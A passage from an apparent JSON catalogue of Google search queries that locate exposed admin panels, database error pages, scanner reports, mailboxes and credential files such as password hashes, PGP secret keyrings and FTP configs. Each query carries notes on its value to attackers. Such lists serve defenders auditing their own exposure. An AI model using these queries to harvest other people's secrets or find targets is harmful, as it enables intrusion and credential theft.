of which are very helpful for hackers...", "submited": "2004-03-04", "request": "\"Incorrect syntax near\" -the", "id": 86}, {"short description": "\"PostgreSQL query failed:  ERROR:  parser: parse error\"", "long description": "An PostgreSQL error message, this message can display path names, function names, filenames and partial code, all of which are very helpful for hackers...", "submited": "2004-03-04", "request": "\"PostgreSQL query failed:  ERROR:  parser: parse error\"", "id": 87}, {"short description": "supplied argument is not a valid PostgreSQL result", "long description": "An PostgreSQL error message, this message can display path names, function names, filenames and partial code, all of which are very helpful for hackers...", "submited": "2004-03-04", "request": "\"Supplied argument is not a valid PostgreSQL result\"", "id": 88}, {"short description": "\"Syntax error in query expression \" -the", "long description": "An Access error message, this message can display path names, function names, filenames and partial code, all of which are very helpful for hackers...", "submited": "2004-03-04", "request": "\"Syntax error in query expression \" -the", "id": 89}, {"short description": "\"An illegal character has been found in the statement\" -\"previous message\"", "long description": "An Informix error message, this message can display path names, function names, filenames and partial code, all of which are very helpful for hackers...", "submited": "2004-03-04", "request": "\"An illegal character has been found in the statement\" -\"previous message\"", "id": 90}, {"short description": "\"A syntax error has occurred\" filetype:ihtml", "long description": "An Informix error message, this message can display path names, function names, filenames and partial code, all of which are very helpful for hackers", "submited": "2004-03-04", "request": "\"A syntax error has occurred\" filetype:ihtml", "id": 91}, {"short description": "\"detected an internal error [IBM][CLI Driver][DB2/6000]\"", "long description": "A DB2 error message, this message can display path names, function names, filenames, partial code and program state, all of which are very helpful for hackers...", "submited": "2004-03-04", "request": "\"detected an internal error [IBM][CLI Driver][DB2/6000]\"", "id": 92}, {"short description": "An unexpected token \"END-OF-STATEMENT\" was found", "long description": "A DB2 error message, this message can display path names, function names, filenames, partial code and program state, all of which are very helpful for hackers...", "submited": "2004-03-04", "request": "An unexpected token \"END-OF-STATEMENT\" was found", "id": 93}, {"short description": "intitle:\"statistics of\" \"advanced web statistics\"", "long description": "the awstats program shows web statistics for web servers. This information includes who is visiting the site, what pages they visit, error codes produced, filetypes hosted on the server, number of hits, and more which can provide very interesting recon information for an attacker.", "submited": "2004-03-04", "request": "intitle:\"statistics of\" \"advanced web statistics\"", "id": 94}, {"short description": "intitle:\"Usage Statistics for\" \"Generated by Webalizer\"", "long description": "The webalizer program shows web statistics for web servers. This information includes who is visiting the site, what pages they visit, error codes produced, filetypes hosted on the server, number of hits, referrers, exit pages, and more which can provide very interesting recon information for an attacker.", "submited": "2004-03-04", "request": "intitle:\"Usage Statistics for\" \"Generated by Webalizer\"", "id": 95}, {"short description": "\"robots.txt\" \"Disallow:\" filetype:txt", "long description": "The robots.txt file serves as a set of instructions for web crawlers. The \"disallow\" tag tells a web crawler where NOT to look, for whatever reason. Hackers will always go to those places first!", "submited": "2004-03-04", "request": "\"robots.txt\" \"Disallow:\" filetype:txt", "id": 96}, {"short description": "\"Warning: pg_connect(): Unable to connect to PostgreSQL server: FATAL\"", "long description": "This search reveals Postgresql servers in yet another way then we had seen before. Path information appears in the error message and sometimes database names.", "submited": "2004-08-25", "request": "\"Warning: pg_connect(): Unable to connect to PostgreSQL server: FATAL\"", "id": 97}, {"short description": "\"phpMyAdmin\" \"running on\" inurl:\"main.php\"", "long description": "From phpmyadmin.net : \"phpMyAdmin is a tool written in PHP intended to handle the administration of MySQL over the WWW.\" Great, easy to use, but lock it down! Things you can do include viewing MySQL runtime information and  system variables, show processes, reloading MySQL, changing privileges, and modifying or exporting databases. Hacker-fodder for sure!", "submited": "2004-03-04", "request": "\"phpMyAdmin\" \"running on\" inurl:\"main.php\"", "id": 98}, {"short description": "inurl:main.php phpMyAdmin", "long description": "From phpmyadmin.net : \"phpMyAdmin is a tool written in PHP intended to handle the administration of MySQL over the WWW.\" Great, easy to use, but lock it down! Things you can do include viewing MySQL runtime information and  system variables, show processes, reloading MySQL, changing privileges, and modifying or exporting databases. Hacker-fodder for sure!", "submited": "2004-03-04", "request": "inurl:main.php phpMyAdmin", "id": 99}, {"short description": "inurl:main.php Welcome to phpMyAdmin", "long description": "From phpmyadmin.net : \"phpMyAdmin is a tool written in PHP intended to handle the administration of MySQL over the WWW.\" Great, easy to use, but lock it down! Things you can do include viewing MySQL runtime information and  system variables, show processes, reloading MySQL, changing privileges, and modifying or exporting databases. Hacker-fodder for sure!", "submited": "2004-03-04", "request": "inurl:main.php Welcome to phpMyAdmin", "id": 100}, {"short description": "\"Warning: Cannot modify header information - headers already sent\"", "long description": "A PHP error message, this message can display path names, function names, filenames and partial code, all of which are very helpful for hackers...", "submited": "2004-03-04", "request": "\"Warning: Cannot modify header information - headers already sent\"", "id": 101}, {"short description": "intitle:\"wbem\" compaq login \"Compaq Information Technologies Group\"", "long description": "These devices are running HP Insight Management Agents for Servers which \"provide device information for all managed subsystems. Alerts are generated by SNMP traps.\" The information on these pages include server addresses and other assorted SNMP information.", "submited": "2004-03-04", "request": "intitle:\"wbem\" compaq login \"Compaq Information Technologies Group\"", "id": 102}, {"short description": "intitle:osCommerce inurl:admin intext:\"redistributable under the GNU\"intext:\"Online Catalog\" -demo -site:oscommerce.com", "long description": "This is a decent way to explore the admin interface of osCommerce e-commerce sites. Depending on how bad the setup of the web store is, web surfers can even Google their way into customer details and order status, all from the Google cache.", "submited": "2004-03-04", "request": "intitle:osCommerce inurl:admin intext:\"redistributable under the GNU\"intext:\"Online Catalog\" -demo -site:oscommerce.com", "id": 103}, {"short description": "intitle:index.of \"Apache\" \"server at\"", "long description": "This is a very basic string found on directory listing pages which show the version of the Apache web server. Hackers can use this information to find vulnerable targets without querying the servers.", "submited": "2004-03-04", "request": "intitle:index.of \"Apache\" \"server at\"", "id": 104}, {"short description": "\"access denied for user\" \"using password\"", "long description": "Another SQL error message, this message can display the username, database, path names and partial SQL code, all of which are very helpful for hackers...", "submited": "2004-03-04", "request": "\"access denied for user\" \"using password\"", "id": 105}, {"short description": "intitle:\"Under construction\" \"does not currently have\"", "long description": "This error message can be used to narrow down the operating system and web server version which can be used by hackers to mount a specific attack.", "submited": "2004-03-04", "request": "intitle:\"Under construction\" \"does not currently have\"", "id": 106}, {"short description": "\"seeing this instead\" intitle:\"test page for apache\"", "long description": "This is the default web page for Apache 1.3.11 - 1.3.26. Hackers can use this information to determine the version of the web server, or to search Google for vulnerable targets. In addition, this indicates that the web server is not well maintained.", "submited": "2004-03-04", "request": "\"seeing this instead\" intitle:\"test page for apache\"", "id": 107}, {"short description": "intitle:\"Test Page for Apache\" \"It Worked!\"", "long description": "This is the default web page for Apache 1.2.6 - 1.3.9. Hackers can use this information to determine the version of the web server, or to search Google for vulnerable targets. In addition, this indicates that the web server is not well maintained.", "submited": "2004-03-04", "request": "intitle:\"Test Page for Apache\" \"It Worked!\"", "id": 108}, {"short description": "intitle:\"Test Page for Apache\" \"It Worked!\" \"on this web\"", "long description": "This is the default web page for Apache 1.2.6 - 1.3.9. Hackers can use this information to determine the version of the web server, or to search Google for vulnerable targets. In addition, this indicates that the web server is not well maintained.", "submited": "2004-03-04", "request": "intitle:\"Test Page for Apache\" \"It Worked!\" \"on this web\"", "id": 109}, {"short description": "\"Can't connect to local\" intitle:warning", "long description": "Another SQL error message, this message can display database name, path names and partial SQL code, all of which are very helpful for hackers...", "submited": "2004-03-04", "request": "\"Can&#039;t connect to local\" intitle:warning", "id": 110}, {"short description": "intitle:index.of dead.letter", "long description": "dead.letter contains the contents of unfinished emails created on the UNIX platform. Emails (finished or not) can contain sensitive information.", "submited": "2004-03-04", "request": "intitle:index.of dead.letter", "id": 111}, {"short description": "intitle:index.of ws_ftp.ini", "long description": "ws_ftp.ini is a configuration file for a popular FTP client that stores usernames, (weakly) encoded passwords, sites and directories that the user can store for later reference. These should not be on the web!", "submited": "2004-03-04", "request": "intitle:index.of ws_ftp.ini", "id": 112}, {"short description": "intitle:index.of administrators.pwd", "long description": "This file contains administrative user names and (weakly) encrypted password for Microsoft Front Page. The file should not be readble to the general public.", "submited": "2004-03-04", "request": "intitle:index.of administrators.pwd", "id": 113}, {"short description": "inurl:secring ext:skr | ext:pgp | ext:bak", "long description": "This file is the secret keyring for PGP encryption. Armed with this file (and perhaps a passphrase), a malicious user can read all your encrypted files! This should not be posted on the web!", "submited": "2004-03-04", "request": "inurl:secring ext:skr | ext:pgp | ext:bak", "id": 114}, {"short description": "intitle:Index.of etc shadow", "long description": "This file contains usernames and (lame) encrypted passwords! Armed with this file and a decent password cracker, an attacker can crack passwords and log into a UNIX system.", "submited": "2004-03-04", "request": "intitle:Index.of etc shadow", "id": 115}, {"short description": "inurl:ManyServers.htm", "long description": "Microsoft Terminal Services Multiple Clients pages. These pages are not necessarily insecure, sine many layers of security can be wrapped around the actual use of this service, but simply being able to find these in Google gives hackers an informational advantage, and many of the sites are not implemented securely.", "submited": "2004-03-04", "request": "inurl:ManyServers.htm", "id": 116}, {"short description": "intitle:\"Terminal Services Web Connection\"", "long description": "Microsoft Terminal Services Web Connector pages. These pages are not necessarily insecure, sine many layers of security can be wrapped around the actual use of this service, but simply being able to find these in Google gives hackers an informational advantage, and many of the sites are not implemented securely. In the worst case scenario these pages may allow an attacker to bypass a firewall gaining access to a \"protected\" machine.", "submited": "2004-03-04", "request": "intitle:\"Terminal Services Web Connection\"", "id": 117}, {"short description": "intitle:\"Remote Desktop Web Connection\"", "long description": "Microsoft Remote Desktop Connection Web Connection pages. These pages are not necessarily insecure, sine many layers of security can be wrapped around the actual use of this service, but simply being able to find these in Google gives hackers an informational advantage, and many of the sites are not implemented securely. In the worst case scenario these pages may allow an attacker to bypass a firewall gaining access to an otherwise inaccessible machine.", "submited": "2004-03-04", "request": "intitle:\"Remote Desktop Web Connection\"", "id": 118}, {"short description": "\"Welcome to Intranet\"", "long description": "According to whatis.com: \"An intranet is a private network that is contained within an enterprise. [...] The main purpose of an intranet is to share company information and computing resources among employees [...] and in general looks like a private version of the Internet.\" Intranets, by definition should not be available to the Internet's unwashed masses as they may contain private corporate information.", "submited": "0000-00-00", "request": "\"Welcome to Intranet\"", "id": 119}, {"short description": "inurl:search.php vbulletin", "long description": "Version 3.0.0 candidate 4 and earlier of Vbulletin may have a cross-site scripting vulnerability. See http://www.securityfocus.com/bid/9656 for more info.", "submited": "2004-03-04", "request": "inurl:search.php vbulletin", "id": 120}, {"short description": "inurl:footer.inc.php", "long description": "From http://www.securityfocus.com/bid/9664, the AllMyPHP family of products (Versions 0.1.2 - 0.4) contains several potential vulnerabilities, som elalowing an attacker to execute malicious code on the web server.", "submited": "2004-03-14", "request": "inurl:footer.inc.php", "id": 121}, {"short description": "inurl:info.inc.php", "long description": "From http://www.securityfocus.com/bid/9664, the AllMyPHP family of products (Versions 0.1.2 - 0.4) contains several potential vulnerabilities, som elalowing an attacker to execute malicious code on the web server.", "submited": "2004-03-14", "request": "inurl:info.inc.php", "id": 122}, {"short description": "inurl:admin intitle:login", "long description": "This search can find administrative login pages. Not a vulnerability in and of itself, this query serves as a locator for administrative areas of a site. Further investigation of the surrounding directories can often reveal interesting information.", "submited": "2004-03-14", "request": "inurl:admin intitle:login", "id": 123}, {"short description": "intitle:admin intitle:login", "long description": "This search can find administrative login pages. Not a vulnerability in and of itself, this query serves as a locator for administrative areas of a site. Further investigation of the surrounding directories can often reveal interesting information.", "submited": "2004-03-14", "request": "intitle:admin intitle:login", "id": 124}, {"short description": "filetype:asp \"Custom Error Message\" Category Source", "long description": "This is an ASP error message that can reveal information such as compiler used, language used, line numbers, program names and partial source code.", "submited": "2004-03-16", "request": "filetype:asp \"Custom Error Message\" Category Source", "id": 125}, {"short description": "\"Fatal error: Call to undefined function\" -reply -the -next", "long description": "This error message can reveal information such as compiler used, language used, line numbers, program names and partial source code.", "submited": "2004-03-16", "request": "\"Fatal error: Call to undefined function\" -reply -the -next", "id": 126}, {"short description": "inurl:admin filetype:xls", "long description": "This search can find Excel spreadsheets in an administrative directory or of an administrative nature. Many times these documents contain sensitive information.", "submited": "2004-03-16", "request": "inurl:admin filetype:xls", "id": 127}, {"short description": "inurl:admin inurl:userlist", "long description": "This search reveals userlists of administrative importance. Userlists found using this method can range from benign \"message group\" lists to system userlists containing passwords.", "submited": "2004-03-16", "request": "inurl:admin inurl:userlist", "id": 128}, {"short description": "inurl:admin filetype:asp inurl:userlist", "long description": "This search reveals userlists of administrative importance. Userlists found using this method can range from benign \"message group\" lists to system userlists containing passwords.", "submited": "2004-03-16", "request": "inurl:admin filetype:asp inurl:userlist", "id": 129}, {"short description": "inurl:backup intitle:index.of inurl:admin", "long description": "This query reveals backup directories. These directories can contain various information ranging from source code, sql tables, userlists, and even passwords.", "submited": "2004-03-16", "request": "inurl:backup intitle:index.of inurl:admin", "id": 130}, {"short description": "\"Welcome to PHP-Nuke\" congratulations", "long description": "This finds default installations of the postnuke CMS system. In many cases, default installations can be insecure especially considering that the administrator hasn't gotten past the first few installation steps.", "submited": "2004-03-18", "request": "\"Welcome to PHP-Nuke\" congratulations", "id": 131}, {"short description": "allintitle:Netscape FastTrack Server Home Page", "long description": "This finds default installations of Netscape Fasttrack Server. In many cases, default installations can be insecure especially considering that the administrator hasn't gotten past the first few installation steps.", "submited": "2004-03-18", "request": "allintitle:Netscape FastTrack Server Home Page", "id": 132}, {"short description": "\"Welcome to phpMyAdmin\" \" Create new database\"", "long description": "phpMyAdmin is a widly spread webfrontend used to mantain sql databases. The default security mechanism is to leave it up to the admin of the website to put a .htaccess file in the directory of the application. Well gues what, obviously  some admins are either too lazy or don't know how to secure their directories.  These pages should obviously not be accessable to the public without some kind of password ;-)", "submited": "2003-08-12", "request": "\"Welcome to phpMyAdmin\" \" Create new database\"", "id": 133}, {"short description": "intitle:\"Index of c:\\Windows\"", "long description": "These pages indicate that they are sharing the C:\\WINDOWS directory, which is the system folder for many Windows installations.", "submited": "2004-02-10", "request": "intitle:\"Index of c:\\Windows\"", "id": 134}, {"short description": "warning \"error on line\" php sablotron", "long description": "sablotron is an XML toolit thingie. This query hones in on error messages generated by this toolkit. These error messages reveal all sorts of interesting stuff such as source code snippets, path and filename info, etc.", "submited": "2004-03-11", "request": "warning \"error on line\" php sablotron", "id": 135}, {"short description": "\"Most Submitted Forms and Scripts\" \"this section\"", "long description": "More www statistics on the web. This one is very nice.. Lots of directory info, and client access statistics, email addresses.. lots of good stuff.These are SOOO dangerous, especially if INTRANET users get logged... talk about mapping out an intranet quickly...", "submited": "2004-03-22", "request": "\"Most Submitted Forms and Scripts\" \"this section\"", "id": 136}, {"short description": "inurl:changepassword.asp", "long description": "This is a common script for changing passwords. Now, this doesn't actually reveal the password, but it provides great information about the security layout of a server. These links can be used to troll around a website.", "submited": "2004-03-24", "request": "inurl:changepassword.asp", "id": 137}, {"short description": "\"Select a database to view\" intitle:\"filemaker pro\"", "long description": "An oldie but a goodie. This search locates servers which provides access to Filemaker pro databases via the web. The severity of this search varies wildly depending on the security of the database itself. Regardless, if Google can crawl it, it's potentially using cleartext authentication.", "submited": "2004-03-29", "request": "\"Select a database to view\" intitle:\"filemaker pro\"", "id": 138}, {"short description": "\"not for distribution\" confidential", "long description": "The terms \"not for distribution\" and confidential indicate a sensitive document. Results vary wildly, but web-based documents are for public viewing, and should neither be considered confidential or private.", "submited": "2004-03-29", "request": "\"not for distribution\" confidential", "id": 139}, {"short description": "\"Thank you for your order\" +receipt", "long description": "After placing an order via the web, many sites provide a page containing the phrase \"Thank you for your order\" and provide a receipt for future reference. At the very least, these pages can provide insight into the structure of a web-based shop.", "submited": "2004-03-29", "request": "\"Thank you for your order\" +receipt", "id": 140}, {"short description": "allinurl:intranet admin", "long description": "According to whatis.com: \"An intranet is a private network that is contained within an enterprise. [...] The main purpose of an intranet is to share company information and computing resources among employees [...] and in general looks like a private version of the Internet.\" Intranets, by definition should not be available to the Internet's unwashed masses as they may contain private corporate information. Some of these pages are simply portals to an Intranet site, which helps with information gathering.", "submited": "2004-03-29", "request": "allinurl:intranet admin", "id": 141}, {"short description": "intitle:\"Nessus Scan Report\" \"This file was generated by Nessus\"", "long description": "This search yeids nessus scan reports. Even if some of the vulnerabilities have been fixed, we can still gather valuable information about the network/hosts. This also works with ISS and any other vulnerability scanner which produces reports in html or text format.", "submited": "2004-03-30", "request": "intitle:\"Nessus Scan Report\" \"This file was generated by Nessus\"", "id": 142}, {"short description": "intitle:\"index.of.personal\"", "long description": "This directory has various personal documents and pictures.", "submited": "2004-03-29", "request": "intitle:\"index.of.personal\"", "id": 143}, {"short description": "\"This report lists\" \"identified by Internet Scanner\"", "long description": "This search yeids ISS scan reports, revealing potential vulnerabilities on hosts and networks. Even if some of the vulnerabilities have been fixed, information about the network/hosts can still be gleaned.", "submited": "2004-03-30", "request": "\"This report lists\" \"identified by Internet Scanner\"", "id": 144}, {"short description": "\"Network Host Assessment Report\" \"Internet Scanner\"", "long description": "This search yeids ISS scan reports, revealing potential vulnerabilities on hosts and networks. Even if some of the vulnerabilities have been fixed, information about the network/hosts can still be gleaned.", "submited": "2004-03-30", "request": "\"Network Host Assessment Report\" \"Internet Scanner\"", "id": 145}, {"short description": "\"Network Vulnerability Assessment Report\"", "long description": "This search yeids vulnerability scanner reports, revealing potential vulnerabilities on hosts and networks. Even if some of the vulnerabilities have been fixed, information about the network/hosts can still be gleaned.", "submited": "2004-03-30", "request": "\"Network Vulnerability Assessment Report\"", "id": 146}, {"short description": "\"Host Vulnerability Summary Report\"", "long description": "This search yeids host vulnerability scanner reports, revealing potential vulnerabilities on hosts and networks. Even if some of the vulnerabilities have been fixed, information about the network/hosts can still be gleaned.", "submited": "2004-03-30", "request": "\"Host Vulnerability Summary Report\"", "id": 147}, {"short description": "intitle:index.of inbox", "long description": "This search reveals potential location for mailbox files. In some cases, the data in this directory or file may be of a very personal nature and may include sent and received emails and archives of email data.", "submited": "2004-04-05", "request": "intitle:index.of inbox", "id": 148}, {"short description": "intitle:index.of inbox dbx", "long description": "This search reveals potential location for mailbox files. In some cases, the data in this directory or file may be of a very personal nature and may include sent and received emails and archives of email data.", "submited": "2004-04-05", "request": "intitle:index.of inbox dbx", "id": 149}, {"short description": "intitle:index.of cleanup.log", "long description": "This search reveals potential location for mailbox files by keying on the Outlook Express cleanup.log file. In some cases, the data in this directory or file may be of a very personal nature and may include sent and received emails and archives of email data.", "submited": "2004-04-05", "request": "intitle:index.of inbox dbx", "id": 150}, {"short description": "\"#mysql dump\" filetype:sql", "long description": "This reveals mySQL database dumps. These database dumps list the structure and content of databases, which can reveal many different types of sensitive information.", "submited": "2004-04-05", "request": "\"#mysql dump\" filetype:sql", "id": 151}, {"short description": "allinurl:install/install.php", "long description": "Pages with install/install.php files may be in the process of installing a new service or program. These servers may be insecure due to insecure default settings. In some cases, these servers may allow for a new installation of a program or service with insecure settings. In other cases, snapshot data about an install process can be gleaned from cached page images.", "submited": "2004-04-06", "request": "allinurl:install/install.php", "id": 152}, {"short description": "inurl:vbstats.php \"page generated\"", "long description": "This is your typical stats page listing referrers and top ips and such. This information can certainly be used to gather information about a site and its visitors.", "submited": "2004-04-08", "request": "inurl:vbstats.php \"page generated\"", "id": 153}, {"short description": "\"index of\" / lck", "long description": "These lock files often contain usernames of the user that has locked the file. Username harvesting can be done using this technique.", "submited": "2004-04-13", "request": "\"index of\" / lck", "id": 154}, {"short description": "\"Index of\" / \"chat/logs\"", "long description": "This search reveals chat logs. Depending on the contents of the logs, these files could contain just about anything!", "submited": "2004-04-13", "request": "\"Index of\" / \"chat/logs\"", "id": 155}, {"short description": "index.of perform.ini", "long description": "This file contains information about the mIRC client and may include channel and user names.", "submited": "2004-04-13", "request": "index.of perform.ini", "id": 156}, {"short description": "\"SnortSnarf alert page\"", "long description": "snort is an intrusion detection system. SnorfSnarf creates pretty web pages from intrusion detection data. These pages show what the bad guys are doing to a system. Generally, it's a bad idea to show the bad guys what you've noticed.", "submited": "2004-04-16", "request": "\"SnortSnarf alert page\"", "id": 157}, {"short description": "inurl:\"newsletter/admin/\" intitle:\"newsletter admin\"", "long description": "These pages generally contain newsletter administration pages. Some of these site are password protected, others are not, allowing unauthorized users to send mass emails to an entire mailing list.", "submited": "2004-04-16", "request": "inurl:\"newsletter/admin/\" intitle:\"newsletter admin\"", "id": 158}, {"short description": "inurl:\"newsletter/admin/\"", "long description": "These pages generally contain newsletter administration pages. Some of these site are password protected, others are not, allowing unauthorized users to send mass emails to an entire mailing list. This is a less acurate search than the similar intitle:\"newsletter admin\" search.", "submited": "2004-04-16", "request": "inurl:\"newsletter/admin/\"", "id": 159}, {"short description": "inurl:phpSysInfo/ \"created by phpsysinfo\"", "long description": "This statistics program allows the an admin to view stats about a webserver. Some sites leave this in a publically accessible web page. Hackers could have access to data such as the real IP address of the server, server memory usage, general system info such as  OS, type of chip, hard-drive makers and much more.", "submited": "2004-04-16", "request": "inurl:phpSysInfo/ \"created by phpsysinfo\"", "id": 160}, {"short description": "allinurl: admin mdb", "long description": "Not all of these pages are administrator's access databases containing usernames, passwords and other sensitive information, but many are!", "submited": "2004-04-16", "request": "allinurl: admin mdb", "id": 161}, {"short description": "allinurl:\"exchange/logon.asp\"", "long description": "According to Microsoft \"Microsoft (R) Outlook (TM) Web Access is a Microsoft Exchange Active Server Application that gives you private access to your Microsoft Outlook or Microsoft Exchange personal e-mail account so that you can view your Inbox from any Web Browser. It also allows you to view Exchange server public folders and the Address Book from the World Wide Web. Anyone can post messages anonymously to public folders or search for users in the Address Book. \" Now, consider for a moment and you will understand why this could be potentially bad.", "submited": "2004-04-16", "request": "allinurl:\"exchange/logon.asp\"", "id": 162}, {"short description": "intitle:\"Index of\" cfide", "long description": "This is the top level directory of ColdFusion, a powerful web development environment. This directory most likely contains sensitive information about a ColdFusion developed site.", "submited": "2004-04-19", "request": "intitle:\"Index of\" cfide", "id": 163}, {"short description": "intitle:\"ColdFusion Administrator Login\"", "long description": "This is the default login page for ColdFusion administration. Although many of these are secured, this is an indicator of a default installation, and may be inherantly insecure. In addition, this search provides good information about the version of ColdFusion as well as the fact that ColdFusion is installed on the server.", "submited": "2004-04-19", "request": "intitle:\"ColdFusion Administrator Login\"", "id": 164}, {"short description": "intitle:\"Error Occurred\" \"The error occurred in\" filetype:cfm", "long description": "This is a typical error message from ColdFusion. A good amount of information is available from an error message like this including lines of source code, full pathnames, SQL query info, database name, SQL state info and local time info.", "submited": "2004-04-19", "request": "intitle:\"Error Occurred\" \"The error occurred in\" filetype:cfm", "id": 165}, {"short description": "inurl:login.cfm", "long description": "This is the default login page for ColdFusion. Although many of these are secured, this is an indicator of a default installation, and may be inherantly insecure. In addition, this search provides good information about the version of ColdFusion as well as the fact that ColdFusion is installed on the server.", "submited": "2004-04-19", "request": "inurl:login.cfm", "id": 166}, {"short description": "filetype:cfm \"cfapplication name\" password", "long description": "These files contain ColdFusion source code. In some cases, the pages are examples that are found in discussion forums. However, in many cases these pages contain live sourcecode with usernames, database names or passwords in plaintext.", "submited": "2004-04-19", "request": "filetype:cfm \"cfapplication name\" password", "id": 167}, {"short description": "inurl:\":10000\" intext:webmin", "long description": "Webmin is a html admin interface for Unix boxes. It is run on a proprietary web server listening on the default port of 10000.", "submited": "2004-04-20", "request": "inurl:\":10000\" intext:webmin", "id": 168}, {"short description": "allinurl:/examples/jsp/snp/snoop.jsp", "long description": "These pages reveal information about the server including path information, port information, etc.", "submited": "2004-04-20", "request": "allinurl:/examples/jsp/snp/snoop.jsp", "id": 169}, {"short description": "allinurl:servlet/SnoopServlet", "long description": "These pages reveal server information such as port, server software version, server name, full paths, etc.", "submited": "2004-04-20", "request": "allinurl:servlet/SnoopServlet", "id": 170}, {"short description": "intitle:\"Test Page for Apache\"", "long description": "This is the default web page for Apache 1.2.6 - 1.3.9. Hackers can use this information to determine the version of the web server, or to search Google for vulnerable targets. In addition, this indicates that the web server is not well maintained.", "submited": "2004-04-20", "request": "intitle:\"Test Page for Apache\"", "id": 171}, {"short description": "inurl:login.asp", "long description": "This is a typical login page. It has recently become a target for SQL injection. Comsec's article at http://www.governmentsecurity.org/articles/SQLinjectionBasicTutorial.php brought this to my attention.", "submited": "2004-04-21", "request": "inurl:login.asp", "id": 172}, {"short description": "inurl:/admin/login.asp", "long description": "This is a typical login page. It has recently become a target for SQL injection. Comsec's article at http://www.governmentsecurity.org/articles/SQLinjectionBasicTutorial.php brought this to my attention.", "submited": "2004-04-21", "request": "inurl:/admin/login.asp", "id": 173}, {"short description": "\"Running in Child mode\"", "long description": "This is a gnutella client that was picked up by google. There is a lot of data present including transfer statistics, port numbers, operating system, memory, processor speed, ip addresses, and gnutella client versions.", "submited": "2004-04-21", "request": "\"Running in Child mode\"", "id": 174}, {"short description": "\"This is a Shareaza Node\"", "long description": "These pages are from Shareaza client programs. Various data is displayed including client version, ip address, listening ports and uptime.", "submited": "2004-04-21", "request": "\"This is a Shareaza Node\"", "id": 175}, {"short description": "\"VNC Desktop\" inurl:5800", "long description": "VNC is a remote-controlled desktop product. Depending on the configuration, remote users may not be presented with a password. Even when presented with a password, the mere existance of VNC can be important to an attacker, as is the open port of 5800.", "submited": "2004-04-21", "request": "\"VNC Desktop\" inurl:5800", "id": 176}, {"short description": "\"index of cgi-bin\"", "long description": "CGI directories contain scripts which can often be exploited by attackers. Regardless of the vulnerability of such scripts, a directory listing of these scripts can prove helpful.", "submited": "2004-04-23", "request": "\"index of cgi-bin\"", "id": 177}, {"short description": "intitle:Snap.Server inurl:Func=", "long description": "This page reveals the existance of a SNAP server (Netowrk attached server or NAS devices) Depending on the configuration, these servers may be vulnerable, but regardless the existance of this server is useful for information gathering.", "submited": "2004-04-23", "request": "intitle:Snap.Server inurl:Func=", "id": 178}, {"short description": "inurl:server-status \"apache\"", "long description": "This page shows all sort of information about the Apache web server. It can be used to track process information, directory maps, connection data, etc.", "submited": "2004-04-26", "request": "inurl:server-status \"apache\"", "id": 179}, {"short description": "eggdrop filetype:user user", "long description": "These are eggdrop config files. Avoiding a full-blown descussion about eggdrops and IRC bots, suffice it to say that this file contains usernames and passwords for IRC users.", "submited": "2004-04-26", "request": "eggdrop filetype:user user", "id": 180}, {"short description": "intitle:\"index of\" intext:connect.inc", "long description": "These files often contain usernames and passwords for connection to mysql databases. In many cases, the passwords are not encoded or encrypted.", "submited": "2004-04-26", "request": "intitle:\"index of\" intext:connect.inc", "id": 181}, {"short description": "intitle:\"MikroTik RouterOS Managing Webpage\"", "long description": "This is the front page entry point to a \"Mikro Tik\" Router.", "submited": "2004-04-26", "request": "intitle:\"MikroTik RouterOS Managing Webpage\"", "id": 182}, {"short description": "inurl:fcgi-bin/echo", "long description": "This is the fastcgi echo script, which provides a great deal of information including port numbers, server software versions, port numbers, ip addresses, path names, file names, time zone, process id's, admin email, fqdns, etc!", "submited": "2004-04-28", "request": "inurl:fcgi-bin/echo", "id": 183}, {"short description": "inurl:cgi-bin/printenv", "long description": "This is the print environemnts script which lists sensitive information such as path names, server names, port numbers, server software and version numbers, administrator email addresses and more.", "submited": "2004-04-28", "request": "inurl:cgi-bin/printenv", "id": 184}, {"short description": "intitle:\"Execution of this script not permitted\"", "long description": "This is a cgiwrap error message which displays admin name and email, port numbers, path names, and may also include optional information like phone numbers for support personnel.", "submited": "2004-04-28", "request": "intitle:\"Execution of this script not permitted\"", "id": 185}, {"short description": "inurl:perl/printenv", "long description": "This is the print environemnts script which lists sensitive information such as path names, server names, port numbers, server software and version numbers, administrator email addresses and more.", "submited": "2004-04-28", "request": "inurl:perl/printenv", "id": 186}, {"short description": "inurl:j2ee/examples/jsp", "long description": "This directory contains sample JSP scripts which are installed on the server. These programs may have security vulnerabilities and can be used by an attacker to footprint the server.", "submited": "2004-04-28", "request": "inurl:j2ee/examples/jsp", "id": 187}, {"short description": "inurl:ojspdemos", "long description": "This directory contains sample Oracle JSP scripts which are installed on the server. These programs may have security vulnerabilities and can be used by an attacker to footprint the server.", "submited": "2004-04-28", "request": "inurl:ojspdemos", "id": 188}, {"short description": "inurl:server-info \"Apache Server Information\"", "long description": "This is the Apache server-info program. There is so much sensitive stuff listed on this page that it's hard to list it all here. Some informatino listed here includes server version and build, software versions, hostnames, ports, path info, modules installed, module info, configuration data and so much more....", "submited": "2004-04-28", "request": "inurl:server-info \"Apache Server Information\"", "id": 189}, {"short description": "inurl:pls/admin_/gateway.htm", "long description": "This is a default login portal used by Oracle. In addition to the fact that this file can be used to footprint a web server and determine it's version and software, this page has been targeted in many vulnerability reports as being a source of an SQL injection vulnerability. This problem, when exploited can lead to unauthorized privileges to the databse. In addition, this page may allow unauthorized modification of parameters on the server.", "submited": "2004-04-28", "request": "inurl:pls/admin_/gateway.htm", "id": 190}, {"short description": "inurl:/pls/sample/admin_/help/", "long description": "This is the default installation location of Oracle manuals. This helps in footprinting a server, allowing an attacker to determine software version information which may aid in an attack.", "submited": "2004-04-28", "request": "inurl:/pls/sample/admin_/help/", "id": 191}, {"short description": "intitle:\"Gateway Configuration Menu\"", "long description": "This is a normally protected configuration menu for Oracle Portal Database Access Descriptors (DADs) and Listener settings. This page is normally password protected, but Google has uncovered sites which are not protected. Attackers can make changes to the servers found with this query.", "submited": "2004-04-28", "request": "intitle:\"Gateway Configuration Menu\"", "id": 192}, {"short description": "intitle:\"Remote Desktop Web Connection\" inurl:tsweb", "long description": "This is the login page for Microsoft's Remote Desktop Web Connection, which allows remote users to connect to (and optionally control) a user's desktop. Although authentication is built into this product, it is still possible to run this service without authentication. Regardless, this search serves as a footprinting mechanisms for an attacker.", "submited": "2004-04-28", "request": "intitle:Remote.Desktop.Web.Connection inurl:tsweb", "id": 193}, {"short description": "inurl:php inurl:hlstats intext:\"Server Username\"", "long description": "This page shows the halflife stat script and reveals the username to the system. Table structure, database name and recent SQL queries are also shown on most systems.", "submited": "2004-04-28", "request": "inurl:php inurl:hlstats intext:\"Server Username\"", "id": 194}, {"short description": "intext:\"Tobias Oetiker\" \"traffic analysis\"", "long description": "This is the 